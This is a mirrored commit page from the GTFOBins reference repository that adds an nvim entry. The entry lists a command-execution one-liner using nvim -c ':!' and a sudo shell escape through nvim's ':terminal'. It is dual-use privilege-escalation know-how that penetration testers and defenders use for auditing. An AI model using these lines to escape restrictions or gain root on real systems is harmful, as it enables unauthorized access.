mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Add nvim
This commit is contained in:
parent
ac8e667a7e
commit
75b8575c41
10
_gtfobins/nvim.md
Normal file
10
_gtfobins/nvim.md
Normal file
@ -0,0 +1,10 @@
|
||||
---
|
||||
functions:
|
||||
command:
|
||||
- code: |
|
||||
COMMAND=id
|
||||
nvim -c ':!'$COMMAND
|
||||
sudo:
|
||||
- code: |
|
||||
sudo nvim -c ':terminal'
|
||||
---
|
Loading…
Reference in New Issue
Block a user